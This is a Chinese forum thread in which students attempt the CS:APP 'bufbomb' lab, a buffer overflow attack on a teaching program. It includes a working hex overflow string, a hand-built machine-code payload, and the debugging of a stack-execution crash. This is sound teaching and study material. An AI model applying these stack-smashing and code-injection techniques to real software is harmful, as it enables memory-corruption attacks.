【好玩】缓冲区溢出攻击实验

pigjj

1. 
   
2. pigjj@Ale:~/prog/c/atack$ uname -a
   
3. Linux Ale 2.4.26-1-386 #1 Thu Jul 22 12:46:23 JST 2004 i686 GNU/Linux
   
4. pigjj@Ale:~/prog/c/atack$ gcc -v
   
5. Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.4/specs
   
6. Configured with: ../src/configure -v --enable-languages=c,c++,java,f77,pascal,objc,ada,treelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i486-linux
   
7. Thread model: posix
   
8. gcc version 3.3.4 (Debian 1:3.3.4-3)
   
9. pigjj@Ale:~/prog/c/atack$ ./a.out
   
10. Type Hex string:12345678 12345678 12345678 12345678 12345678 12345678 f8efffbf eb840408 44686408 efbeadde d8f9ffbf 27850408
    
11. getbuf returned 0xdeadbeef
    

复制代码

I got it  

zne

前面大家都是修改了test的返回地址，修改getbuf的返回地址大家觉得可以么？

我想先贴一下我看的书里的原题
代码在这里 http://csapp.cs.cmu.edu/public/code.html    bufbomb.c
题目：
Homework Problem 3.38 [Category 3]:

In this problem, you will mount a buffer overflow attack on your own program.

As stated earlier, we do not condone using this or any other form of attack to gain unauthorized access to a system, but by doing thisexercise, you will learn a lot about machine-level programming.

Download the file bufbomb.c from the CS:APP website and compile it to create an executable program.

In bufbomb.c, you will find the following functions:
1 int getbuf()
2 {
3 char buf[12];
4 getxs(buf);
5 return 1;
6 }
7
8 void test()
9 {
10 int val;
11 printf("Type Hex string:";
12 val = getbuf();
13 printf("getbuf returned 0x%x\n", val);
14 }
The function getxs (also in bufbomb.c) is similar to the library gets, except that it reads charactersencoded as pairs of hex digits. For example, to give it a string “0123,” the user would type in the string“30 31 32 33.” The function ignores blank characters. Recall that decimal digit x has ASCII representation0x3x.

A typical execution of the program is as follows:
unix>; ./bufbomb
Type Hex string: 30 31 32 33
getbuf returned 0x1
Looking at the code for the getbuf function, it seems quiteapparent that it will return value 1 whenever it
is called. It appears as if the call to getxs has no effect.

Your task is to make getbuf return -559038737(0xdeadbeef) to test, simply by typing an appropriate hexadecimal string to the prompt.

Here are some ideas that will help you solve the problem:
Use OBJDUMP to create a disassembled version of bufbomb. Study this closely to determine howthe stack frame for getbuf is organized and how overflowing the buffer will alter the saved program state.

Run your program under GDB. Set a breakpoint within getbuf and run to this breakpoint. Determine such parameters as the value of %ebp and the saved value of any state that will be overwritten when you overflow the buffer.

Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with GCC and disassemble it with OBJDUMP. You should be able to get the exact byte sequence that you will type at the prompt. .

OBJDUMP will producesome pretty strange looking assembly instructions when it tries to disassemble the data in your file,
but the hexadecimal byte sequence should be correct.

Keep in mind that your attack is very machine and compiler specific. You may need to alter your string when running on a different machine or with a different version of GCC.

zne

我理解题目要求我们在向buf[]中输入数据时，输入一些能够执行的机器指令，在我的机器上，getbuf的栈祯是这样

return  address|     test的栈帧，存储了call getbuf之后的下一条指令地址
__saved %ebp|  %ebp 从这里开始是getbuf的栈帧，存储test的帧指针
____________|
____________|
____________|
____________|
____________|
____________|buf[]

我的想法是应该可以在gdb下运行bufbomb程序，在getbuf处设断点，当运行到getbuf时
        print /x $ebp
                 得到getbuf   frame pointer值，假设结果是 0xbfffffc0
             print /x *(unsigned*) 0xbfffffc0
                 得到getbuf的 frame pointer处存储的test的frame pointer值
            print /x ($ebp-24)
                 得到buf[]的地址

之后我们向buf[]填入8byte数据，先不考虑机器指令的编写

改为buf[]地址   |    return address
保持原值不变    | <-%ebp
90   90  90  90 |
90   90  90  90 |
90   90  90  90 |
90   90  90  90 |
90   90  90  90 |
90   90  90  90 |buf[]

现在将90部分改为下面汇编语句的机器指令表示，假设正常情况下call getbuf之后的下一条指令地址为0Xxxxxxxxx

movl $deadbeef,%eax
pushl $0Xxxxxxxxx
ret

大家觉得这个方法可不可能行得通？我试过将return address覆盖为任意一条已编译好的instruction的地址，能够成功。但将return address覆盖为buf[]地址的话，就会在getbuf ret回test时发生segmentation fault.
这里为什么会发生segmentation fault?怎么才能够ret回这个stack frame部分呢？

输入buf的数据的最后一位'\0',感觉应该不会产生什么破坏，因为将return address覆盖为任意一条已编译好的instruction的地址，能够成功。

converse

没看懂你的意思呀,汗颜中...

你试着截图来说明一下吧

yuxh

不好玩!
在Linux下很正常，跑到unixware下一搞，MD，把我的虚拟机都搞没了!

zne

第一副图: disassemble of test ,getbuf 和bomb

bomb 是在bufbomb.c中加的一段试验性质的代码
修改后的bufbomb.c 比原先只多了一个bomb程序的定义

void bomb()
{
  asm("movl $0xdeadbeef,%eax";
  asm("pushl $0x080484e9";
  asm("ret";
}

/* $begin getbuf-c */
int getbuf()
{
    char buf[12];
    getxs(buf);
    return 1;
}

void test()
{
  int val;
  printf("Type Hex string:";
  val = getbuf();
  printf("getbuf returned 0x%x\n", val);
}
/* $end getbuf-c */

zne

第二副图:  将getbuf返回地址改为 0x080484af, 成功

zne

第三副图:  将getbuf返回地址改为buf[]的地址,失败

第一副图中test对应的汇编代码里
80484bf:    8d 45 e8           lea  0xffffffe8(%ebp),%eax
80484c5:    50                 push %eax
可以看出,buf[]的地址为%ebp+0xffffffe8,即%ebp-24

从第一副图中还可得,
movl $0xdeadbeef,%eax
pushl $0x080484e9
ret
所对应的机器指令是
b8 ef be ad de
68 e9 84 04 08
c3
这段机器代码应该没有问题(因为第二副图中所示的试验是成功的),
但当getbuf试图返回buf[]处执行时,发生了segmentation fault, 大家觉得这是什么原因呢?

converse

我大概知道你是哪里出错了--顺序问题,应该是从高到低来存放你的机器指令,而你原来是从低到高来存放的,暂时还没有时间实践,看你一直在线,怕你等久了,先回复这些,等会我自己试试看.

zne

呵呵很感谢了，困扰了我近一个月^^,我白天也没法试，还得等晚上回家才能试，
不过我试过如果机器指令全换成0X90(nop, no operation 空操作的话)，还是会在getbuf的ret处出segmentation fault的，好像就没有成功跳去buf[]地址，对于处理器和内存操作，很多基本概念我还都不清楚